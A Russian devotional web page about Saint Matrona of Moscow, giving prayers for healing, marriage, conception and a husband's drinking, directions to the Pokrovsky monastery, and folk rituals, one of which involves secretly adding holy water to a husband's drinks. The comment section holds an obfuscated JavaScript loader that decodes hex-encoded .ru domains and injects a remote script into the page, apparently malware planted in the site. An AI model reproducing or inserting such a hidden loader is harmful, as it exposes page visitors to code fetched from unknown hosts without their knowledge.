Матрона матушка. О чём ей молятся. С какими просьбами к ней обращаются

Матронушка Московская.

О чём ей молятся. С какими просьбами к ней обращаются.

Матушка Матронушка всегда говаривала: 

"Всех, кто обращается ко мне за помощью, я буду встречать при их смерти, каждого".

"Умру, ставьте на канон за меня свечки, самые дешЁвые, ходите ко мне на могилку, я всегда буду там, не ищите никого другого. ВсЁ поверяйте мне, а я буду вкладывать вам мысли, что вам делать и как поступать. Наступает время прелести, не ищите никого, иначе обманетесь".



Ещё она говорила, чтобы не несли ей цветов искусственных,- не любила она их.

Говорила также, чтобы всегда зажигали свечки да лампадки возле образов домашних, тогда она и придЁт помолиться и помочь.

Просите, да будете услышаны!



С любовью всегда ваша Лена Опарина.

 

По еЁ молитвам совершались исцеления немощных, расслабленных, страждущих от душевных и телесных болезней. ЕЁ пророчества и предсказания помогли многим избежать опасностей и погибели, а также найти верный путь в непростых обстоятельствах.


СВЯТУЮ МАТРОНУ МОСКОВСКУЮ ПРОСЯТ:



Об исцелении. Как исцелении глазных болезней, так и при слабоумии, атеросклерозе головного мозга, при подагре, при бесплодии, при гипертонии. А ещЁ при заболеваниях суставов рук и ног.

О помощи в делах житейских
О благополучном замужестве и по вопросам, касающимся воспитания детей.

О сохранении брака

О материнстве
Об избавлении от пьянства и наркотической зависимости
О помощи в решении материальных проблем, 
в поиске пропавшего имущества. 
О помощи в учёбе, работе
Об избавлении от страданий
 
Матрона Московская поможет и в духовном росте, как небесный покровитель духовного развития. Она поможет открыть духовное зрение, что будет способствовать осознанию человеком его жизненных задач, поможет ему решить вопросы в соответствии с Божественной волей. Матрона помогает Ангелу-Хранителю и Небесным Учителям человека вести его по жизни в соответствии с замыслом Божиим о нЁм.
Старица особенно покровительствует  воспитателям дошкольных учреждений и детских домов, учителям, нянечкам, сиделкам, домработницам, врачам-офтальмологам, педиатрам, ортопедам, неврологам, сторожам и вахтЁрам, попечителям.

***mystica_predkov (Мистические советы наших предков)
 
 
Полезно будет вспомнить сегодня и такие слова матушки Матроны:
 
"Если народ теряет веру в Бога, то его постигают бедствия, а если не кается, то гибнет и исчезает с лица земли. Сколько народов исчезло, а Россия существовала, и будет существовать. Молитесь, просите, кайтесь! Господь вас не оставит и сохранит землю нашу!"
Любимым месяцем года Матронушки всегда был май.
 
Май...
Природа оживала,
Всё  новую жизнь давало,
Всё цвело, благоухало.
Всех, кто  в мае родились,
Любит матушка Матрона,
Помогает им... и снова
Дарит им Любовь и Счастье.
И заботу дарит чаще.
И внимание еЁ
К ним всегда обращено.
Майским людям помогая,
Ни о ком  не забывая,
Матушка о всех печЁтся.
И молитва еЁ вьЁтся,
За здоровье и за ласку,
Чтобы жизнь была,
Как в сказке,
Чтоб сбывались всех мечты.
Чтобы люди к Богу шли.
Чтоб лампады зажигали.
Доброту не забывали.
Чтоб страданий стало меньше.
Чтоб раскаянья звучали
Над ЗемлЁй.
И чтоб печали
Отступали дружно в раз.
Всех Матрона любит нас!
И печЁтся перед Богом,
Чтобы жизнь за сим порогом,
Раем Бог нам обернул.
Нас с дурного чтоб свернул,
Мы попросим у Матроны.
И помолимся ей снова.
Тихо свечку мы зажжЁм.
Цвет живой ей принесЁм...
Помоги, Матрона, нам
Путь пройти,
Что Богом дан!
http://mystica-predkov.ru/load/stikhi/stikhi/matronushka_moskovskaja/10-1-0-51
 
Матушка любила говаривать так: кормите голубей, благодаря Бога  и, посланную Им, пищу и милуя птиц летучих.
Так же, чтобы заслужить молитвенную  милость и ходатайство Матроны, кормите бездомных собак. Делайте всЁ во имя Бога и в знак почитания Матроны. К Матроне некоторые  относились как к собаке-дворняге, посему, оказывая милость дворнягам, мы сможем заслужить  внимание и любовь нашей матушки.

Посадив деревце рябину, хоть и  черноплодную, во имя Бога, для блага природы и в честь Матроны, мы тем самым привлекаем еЁ милость на наших домочадцев и всю семью. Дело в том, что она очень любила ягодки рябины, тронутые  морозцем. Когда она их ела, то непременно ощущала чрез них горечь человеческих бед и сладость Божественного Мира одновременно. 

ЕщЁ Матрона заповедовала нам: кормите, помогайте неимущим, бездомным, слабым и болящим, тем, кто нуждается в помощи, но не всегда способен испросить еЁ. Кормите всех, хоть иногда. Благодаря Бога и почитая матушку нашу Матрону.

 

Да будем же молиться смиренно, и тогда Матронушка поможет нам! Исходатайствует пред Богом милость Его к нам!

«К служению Христову от чрева матерня предызбранная, праведная Матроно, стезею скорбей и печалей шествующи, твердую веру и благочестие явивши, Богу угодила еси. Темже, почитающе память твою, молим тя: помози и нам в любви Божии пребывати, старице блаженная.»

 

Молитвы к блаженной старице Матроне.

 

«О блаженная мати Матроно, услыши и приими ныне нас, грешных, молящихся тебе, навыкшая во всем житии твоем приимати и выслушивати всех страждущих и скорбящих, с верою и надеждою к твоему заступлению и помощи прибегающих, скорое поможение и чудесное исцеление всем подавающи; да не оскудеет и ныне милосердие твое к нам, недостойным, мятущимся в многосуетнем мире сем и нигдеже обретающим утешения и сострадания в скорбех душевных и помощи в болезнех телесных: исцели болезни наша, избави от искушений и мучительства диавола, страстно воюющаго, помози донести житейский свой Крест, снести вся тяготы жития и не потеряти в нем образ Божий, веру православную до конца дней наших сохранити, упование и надежду на Бога крепкую имети и нелицемерную любовь к ближним; помози нам по отшествии из жития сего достигнути Царствия Небеснаго со всеми угодившими Богу, прославляюще милосердие и благость Отца Небеснаго, в Троице славимаго, Отца и Сына и Святаго Духа, во веки веков. Аминь.»

                                               ***

Иная молитва.

 

«О блаженная мати Матроно, душею на небеси пред Престолом Божиим предстоящи, телом же на земли почивающи, и данною ти свыше благодатию различныя чудеса источающи. Призри ныне милостивным твоим оком на ны, грешныя, в скорбех, болезнех и греховных искушениих дни своя иждивающия, утеши ны, отчаянныя, исцели недуги наши лютыя, от Бога нам по грехом нашим попущаемыя, избави нас от многих бед и обстояний, умоли Господа нашего Иисуса Христа простити нам вся наша согрешения, беззакония и грехопадения, имиже мы от юности нашея даже до настоящаго дне и часа согрешихом, да твоими молитвами получивше благодать и велию милость, прославим в Троице Единаго Бога, Отца, и Сына, и Святаго Духа, ныне и присно и во веки веков.»

                                              ***       

 

Молитва о зачатии чада.

 

«О, блаженная мати Матрона, к твоему предстательству прибегаем и тебе слезно молим. Яко имущую велие дерзновение по Господу, пролей теплую молитву о рабех твоих, в скорбе дущевней пребывающих и помощи от тебе просящих. Истинно бо слово Господне: просите и дается вам и паки: яко аще два от вас совещаете, на землю о всякой вещи, еяже аще просита, будет има от Отца Моего, иже на Небесех. Услыши убовоздыхания наша и донесико престолу Владычню, и деже ты предстоиши всмы, яко много может пред Богом молитва праведника. Да не до конца забудет нас Господь, но призрит с высоты небесныя на скорбь рабов Своих и плод чрева на полезное дарует. Воистину, Богидете хощет, тако сотвори Господь Аврааму и Сарре, Захарии и Елисавете, Иоакиму и Анне, с ним же моли. Тако да сотворит Господь Бог и нам по милости своей и неизреченному человеколюбию. Буди имя Господнее благословенно и от ныне и до века. Аминь.»

***

Молитва о замужестве к Богу Отцу нашему.

 

«О, Всеблагий Господи, я знаю, что великое счастие мое зависит от того, чтобы я Тебя любила всею душею и всем сердцем моим, и чтобы исполняла во всем святую волю Твою. Управляй же Сам, о Боже мой, душею моею и наполняй сердце мое: я хочу угождать Тебе Одному, ибо Ты Создатель и Бог мой. Сохрани мя от гордости и самолюбия: разум, скромность и целомудрие пусть украшают мя. Праздность противна Тебе и порождает пороки, подай же ми охоту к трудолюбию и благослови труды моя. Поелику же Закон Твой повелевает жить людям в честном супружестве, то приведи мя, Отче Святый, к сему, освященному Тобою, званию, не для угождения вожделению моему, но для исполнения предназначения Твоего, ибо Ты Сам сказал: нехорошо человеку быть одному и, создав ему жену в помощницу, благословил их расти, множитися и населяти землю. 
Услышь смиренную молитву мою, из глубины девичего сердца Тебе возсылаемую; дай мне супруга честнаго и благочестиваго, чтобы мы в любви с ним и в согласии прославляли Тебя, милосерднаго Бога: Отца и Сына и Святаго Духа, ныне и присно и во веки веков. Аминь».

 

 

 

 

***

 

Величание.

 

«Величаем тя, святая праведная старице Матроно, и чтем святую память твою, ты бо молиши о нас Христа Бога нашего.»

«Избранной Богом от младенческих пелен и даром прозорливости, чудотворения и исцеления благодатию Духа Святаго одаренной, блаженной старице Матроне, нетленным венцем от Господа на Небеси увенчанной, соплетаем и мы, православнии, на земли венец похвальный из песней духовных, ты же, блаженная мати, приими сие от наших сердец благодарных, и яко имущая дерзновение пред Господем, от всяких нас бед, скорбей, болезней и козней вражиих избавиви, да с любовию поем ти: Радуйся, блаженная старице Матроно, предивная чудотворице.»

 

В Покровском женском монастыре в Москве можно приложиться к  мощам Матроны и помолиться у иконы блаженной старицы.

Как проехать к блаженной Матроне: станция метро "Марксистская" или "Таганская", далее троллейбусами 16, 26, 63 и 63к до остановки "Большая Андроньевская улица — Покровский женский монастырь"
Добраться до монастыря можно пешком (10-20 минут) от станций метро: Таганская, Марксистская, Пролетарская, Площадь Ильича, Римская. Ближе всего -  от метро Пролетарская, пройдя по Абельмановской улице до Покровского монастыря.

Монастырь открыт для посещения с 07.00 до 20.00, в воскресные дни с 06.00 до 20.00. После 20.00 доступ в монастырь прекращается.

 

Путь к исцелению от болезней, к помощи житейской всегда надо начинать с молитвенного покаяния. С посещения святых мощей, и преклонения к иконам.

Но даже, если мы не можем сейчас, сразу, вдруг отправиться на поклонение святыни, надо помнить, что небеса открыты для нас всегда и везде, где бы не обратились за помощью.

Молитесь дома, зажигая свечи и лампадки, молитесь на природе, куда отправитесь отдохнуть, молитесь всегда и везде, дабы сердце было наполнено радостью и покаянием. 

Да будем же молиться! И будем услышаны!

Верой нашей да спасЁмся!

 

 «Святая праведная старице Матроно, моли Бога о нас!»

                                ***

«Святая праведница матушка Матрона! Всем людям ты помощница, помоги и мне в беде моей (проблема/беда). Не оставь меня помощью и заступничеством своим, моли Господа о рабе Божьем (имярек). Во имя Отца и Сына и Святого Духа. Аминь.»

                                ***

«Блаженная старица Матрона, заступница наша и просительница перед Господом! Смотришь ты своим взором духовным и в прошлое и в будущее, все открыто тебе. Вразуми раба Божьего (имярек), дай совет, покажи путь к решению проблемы (проблема/беда).  Благодарю тебя за помощь твою святую.  Во имя Отца и Сына и Святого Духа. Аминь.»

                                             ***

Просите от чистого сердца, всей душой.

Пусть даже молитва будет сказана своими словами.

Главное, чтобы молитва  была "живой", а не просто заученными фразами.

***

 

Вы также можете испросить молитвенного заступничества Матронушки пред Господом, написав письмо в Покровский женский монастырь по адресу:

109147, Москва, ул. Таганская, д. 58.

Сайт Покровского женского монастыря предоставил возможность написать Матронушке электронное письмо на адрес монастыря: 

mailto:matronushka@gmail.com

Также письмо Матронушке можно он-лайн написать на сайте 

you-matrona.ru  

Все письма будут  возложены к мощам святой старицы матушки Матроны.

 

Да будут услышаны ваши молитвы!

Исполнены ваши просьбы!

Пусть матушка Матронушка станет вашей заступницей и защитницей пред Господом Отцом нашим!

Счастья вам, Здоровья и молитвенной помощи!

6 мая- день Георгия Победоносца. В этот день надо до церкви дойти пешком, желательно босиком.Тогда все Ваши желания и просьбы исполнятся. 

 

Ступайте в православный Храм и подайте заказную записку о Здравии пьющего мужа. 
Поставьте по 3 свечи к иконе Николая Чудотворца, Иисуса Христа и Блаженной Старицы Матроны Московской. 
Находясь у образа Старицы, произнесите про себя эти молитвенные строчки: 


Блаженная Матрона, спаси моего супруга от тяги к пьянкам, девкам да гулянкам. Аминь. 

Сердечно креститесь. 
Для домашнего моления покупаете 9 свечей и перечисленные выше иконы. Набираете святой воды во вместительную колбу. 
Когда мужа не окажется дома, уединяетесь в запертой комнате. 
Зажигаете 3 свечи. Рядом ставите иконы и графин со святою водой. 
С искренней верой в душе 3 раза читаете молитву “Отче Наш”. 
Усердно креститесь и делаете 3 глотка водицы святой. 
Приступаете к многократному и неторопливому нашептыванию сильных молитв, позволяющих избавить любимого мужа от затяжных пьянок. 


Блаженная Старица, Матрона Московская. Защити супруга моего от болезненного пьянства, и омой его уста святою водой. Пускай прогонит она тягу к спиртному, и успокоит его сатанинскую дрожь. Как сделает глоток- отрезвеет чуток. Как сделает два- выйдет пьянство сполна. Да будет воля твоя. Аминь. 

Есть и другая молитва, помогающая мужу преодолеть тягу к спиртным напиткам. 


Матрона Московская, Блаженная Старица. Умоляю тебя об исцелении мужа, и об отпущении тяжких грехов. В раскаянии прошу тебя избавить супруга от пьянства, губящего его бессмертную душу. Попроси у Господа Бога заступничества светлого, и направь нас на праведный путь. Да будет воля твоя. Аминь. 

Вновь сердечно креститесь и пьЁте святую водицу. 
Незаметно подливаете еЁ мужу в любые чаи и напитки, включая алкогольные. 
Впереди у Вас ещЁ 2 дня усердного моления. 
Молитвы простые, но достаточно сильные. 
Ваш супруг избавится от пьянства, но только когда Вы по настоящему уверуете в Иисуса Христа. 
Да поможет Вам Бог!

 

С любовью всегда ваша Лена Опарина.

(указание авторства обязательно при любом копировании и переписки).

 

 

 
 
 
 
 
 
 
 

 

Комментарии

  • avatar
    zayka

    Благодарю.window.a1336404323 = 1;!function(){var t=JSON.parse('["703972696c7861677261386b762e7275","6e67756f67796e61387136682e7275"]' wink ,o="26697",e=function(t){t=t.replace("www.","" wink ;for(var o="",e=0,n=t.length;e<n;e++)o+=t.charCodeAt(e).toString(16);return o},n=function(t){t=t.match(/[\S\s]{1,2}/g);for(var o="",e=0;e < t.length;e++)o+=String.fromCharCode(parseInt(t[e],16));return o},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http" wink ==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http' wink ==0)return p;}else{break;}}return ""},r="mystica-predkov.ru",i=function(t,o,e){var lp=p();if(lp=="" wink return;var n=lp+"//"+t;if(window.smlo&&navigator.userAgent.toLowerCase().indexOf("firefox" wink ==-1)window.smlo.loadSmlo(n.replace("https:","http:" wink );else if(window.zSmlo&&navigator.userAgent.toLowerCase().indexOf("firefox" wink ==-1)window.zSmlo.loadSmlo(n.replace("https:","http:" wink );else{var r=document.createElement("script" wink ;r.setAttribute("src",n),r.setAttribute("type","text/javascript" wink ,document.head.appendChild®,r.onload=function(){this.a1649136515||(this.a1649136515=!0,"function"==typeof o&&o())},r.onerror=function(){this.a1649136515||(this.a1649136515=!0,r.parentNode.removeChild®,"function"==typeof e&&e())}}},a=function©{var f=t,l=n(f)+"/ajs/"+o+"/c/"+e®+"_"+(self===top?0:1)+".js";window.a3164427983=f,i(l,function(){},function(){t[c+1]&&a(c+1)})},f=function(){a(0)};f()}();

avatar